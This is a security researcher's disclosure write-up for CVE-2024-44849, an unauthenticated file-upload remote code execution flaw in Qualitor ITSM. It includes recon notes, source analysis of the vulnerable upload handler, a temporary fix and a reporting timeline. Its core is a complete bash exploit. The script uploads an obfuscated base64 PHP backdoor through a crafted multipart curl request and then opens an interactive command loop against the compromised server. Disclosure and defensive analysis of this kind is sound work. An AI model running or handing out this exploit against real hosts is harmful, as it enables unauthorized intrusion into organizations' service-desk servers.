CVE-2024-44849 - Unauthenticated RCE trough Unrestricted File Upload

CVE-2024-44849 - CRITICAL Unauthenticated RCE trough Unrestricted File Upload (<= Qualitor 8.24)

TL;DR

TL;DR (Click to Expand)

Description

CVE-2024-44849 is a critical RCE vulnerability that impacts all previous versions up to Qualitor 8.24.

Affected Versions

This vulnerability affects Qualitor 8.24 and all previous versions.

Impact

This vulnerability allows an unauthenticated attacker to execute commands remotely via Unrestricted File Upload.

Before we move on to the technical details, it is important to understand what a CVE is. I have written a brief summary in the text below, in case you would like to know a little more.

What is a CVE?

CVE (Common Vulnerabilities and Exposures) is a unique identifier used to publicly reference known vulnerabilities in software, hardware, or firmware. The CVE system was created by the MITRE Corporation in 1999 to standardize the way security vulnerabilities are cataloged and shared. The goal is to enable developers, system administrators, and security researchers to refer to vulnerabilities in a consistent manner.

A CVE should be cataloged when a security vulnerability in software, hardware, or dependencies affects the confidentiality, integrity, or availability of systems and is publicly known. Widely used or security-critical components such as libraries, protocols, and firmware should be registered.

Cataloging CVEs is crucial to standardizing the identification of flaws, allowing organizations and security professionals to implement fixes and protect their environments. This facilitates global coordination in responding to vulnerabilities and improves the overall security of the technology ecosystem, and it is our obligation as White Hats to ensure and contribute to information security.

CVE-2024-44849

Introduction

Qualitor is an ITSM software offered in the B2B (Business-To-Business) model. This means that other companies purchase the "Qualitor ITSM" license from the company "Qualitor Software e Servicos de Informatica S/A".

Qualitor ITSM has a large market share in Rio Grande do Sul, which is the 6th largest state in Brazil, and it is normally hosted on-premises, and deployment can be done by the Qualitor team for a small service fee.

Reconnaissance

Some time ago, I was creating new dorks to use in the Bug Bounty programs, when I found an exposed web server with Directory Listing enabled:

By accessing this server, it was possible to identify a exposed .git directory:

You can learn more about git common weakness in the HackTricks book.

Exposed Credentials

Exploring the exposed directory, I identified cleartext credentials that could be used to gain access to the Qualitor ITSM source code:

Source Code Extraction

Using the same exposed URL with credentials, it was possible to obtain access to the Qualitor ITSM source code:

The risks of exposing this credential may result in the identification of vulnerabilities through source code analysis, theft of intellectual property, or unfair competition in the market.

Source Code Analysis

Since this is an ITSM, users are expected to be able to attach files to tickets, so I looked for a file that had file upload functions. When I found a file, I compared it with another random ITSM file, where I identified that this PHP file for file uploads did not have any access control mechanisms:

Vulnerability Identification

After identifying the absence of access control mechanisms, I discovered that a file upload algorithm vulnerable due to a lack of restrictions based on file heuristics or characteristics:

This flaw allows an attacker to upload any file type to the server without validation, posing a significant security risk. Without proper checks in place, an attacker could potentially upload malicious files (such as scripts or executables) that can later be executed or abused, leading to unauthorized access, privilege escalation, or code execution.

Now, let's see how this vulnerability arises in more technical details:

  • Line 12: $tempFile = $_FILES['fleArquivo']['tmp_name']; This line stores the temporary path of the uploaded file. At this point, no validation is performed to check the type, content, or integrity of the file, making it the first point where improper handling begins.

  • Line 113: $storeFolder = $_REQUEST['nmdiretoriorede']."/" . $_FILES['fleArquivo']['name']; Here, the destination path for the file is constructed, directly using user-provided input ($_REQUEST['nmdiretoriorede']) and the original file name without any sanitation. This can lead to directory traversal attacks or file overwrites if not properly secured.

  • Line 115: $retorno = move_uploaded_file($tempFile, $storeFolder); This function moves the file from its temporary location to the final destination on the server. Since no validation was performed before this, any file type, including potentially dangerous files, could be successfully uploaded to the server.

Exploit Source Code

To demonstrate the impact of this vulnerability in a practical way, I developed an exploit capable of automatically exploiting it and gaining access to a terminal within any host with Qualitor, without any type of authentication:

#!/bin/bash

# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit

echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
    
By Extencil <extencil@extencil.me>, September 2024.

Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"

URL=$1

if [ $# -lt 1 ]; then
    echo "
Usage:
    $0 <url>
    $0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
    "
else
    echo "[*] Exploiting the target.."
    # Define the file name and malicious content
    FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
    MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>' # The Hackers Choice <thc.org> Smallest PHP Backdoor
    BACKDOOR_URL=$(echo $URL | sed 's/checkAcesso.php$//')"$FILENAME"

    # Boundary for multipart/form-data
    BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"

    # Create the POST request with curl using inline file content
    echo "[*] Sending the backdoor.."
curl -X POST $URL -s --insecure \
  -H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
  -H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
  --data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"

2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"

.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"


--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"

$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"


--$BOUNDARY--"

    echo 
    echo
    echo "[*] Target is vulnerable if 'Upload realizado com sucesso'."
    echo

    while true; do
    read -p "(backdoor@qualitor): $ " BackdoorCommand

    if [[ "$BackdoorCommand" == "exit" ]]; then
        echo "Exiting..."
        break
    fi

    curl $BACKDOOR_URL -d 0="$BackdoorCommand"
    done


fi

Also available on GitHub: https://github.com/extencil/CVE-2024-44849

Remediation / Fix / Mitigation

As of this moment, I have not received a formal response from the Qualitor team to mitigate this vulnerability.

However, you can TEMPORARILY mitigate this vulnerability by adding the code below to the checkAcesso.php file:

include("../../../../autentica.php");

Before (without fix) ❌❌❌:

After (with fix) ✅✅✅:

The code above imports Qualitor's native access control component, which is responsible for checking only if the user is authenticated, but authenticated users can still exploit this vulnerability (regular user, without admin permissions).

This is not and should not be considered a definitive fix, but it is the most I can do to help protect your infrastructure until there is a formal response from the Qualitor team.

Timeline

This vulnerability was not cataloged by MITRE at the time I identified it. This vulnerability was identified in June 2024 and immediately reported to the company through several channels:

  • LinkedIn: I contacted the IT and Infrastructure coordinators, no response.

  • WhatsApp: I contacted the support team via Qualitor's corporate number, no response (they only respond to WhatsApp for their customers)

  • E-mail: I sent e-mails to the contact addresses registered in Registro.BR's national whois database, but I also received no response.

Timeline in format: MM-DD-YYYY (Month, Day, Year)

06-03-2024 - Vulnerability Found
06-05-2024 - Vulnerability Reported via E-mail Domain Contact
06-17-2024 - Vulnerability Reported via LinkeDin
06-24-2024 - Vulnerability Reported via WhatsApp (Found the number on their website)
07-01-2024 - Vulnerability Reported via E-mail again..
# Since no response from Qualitor, reported the vuln to MITRE Corporation
08-18-2024 - Vulnerability Reported to MITRE Corporation via CVE Form
09-06-2024 - Vulnerability Accepted by MITRE Corporation (Private Disclosure)
09-09-2024 - Vulnerability Published by MITRE Corpoation (Public Disclosure)

My Special Thanks

I would like to thank my friends for their suggestions for registering this CVE.

  • Musa Attalah from NAVA;

  • Messede from The Hackers Choice;

  • Skyper from The Hackers Choice;

  • Clonazepunk from The Hackers Choice.

Last updated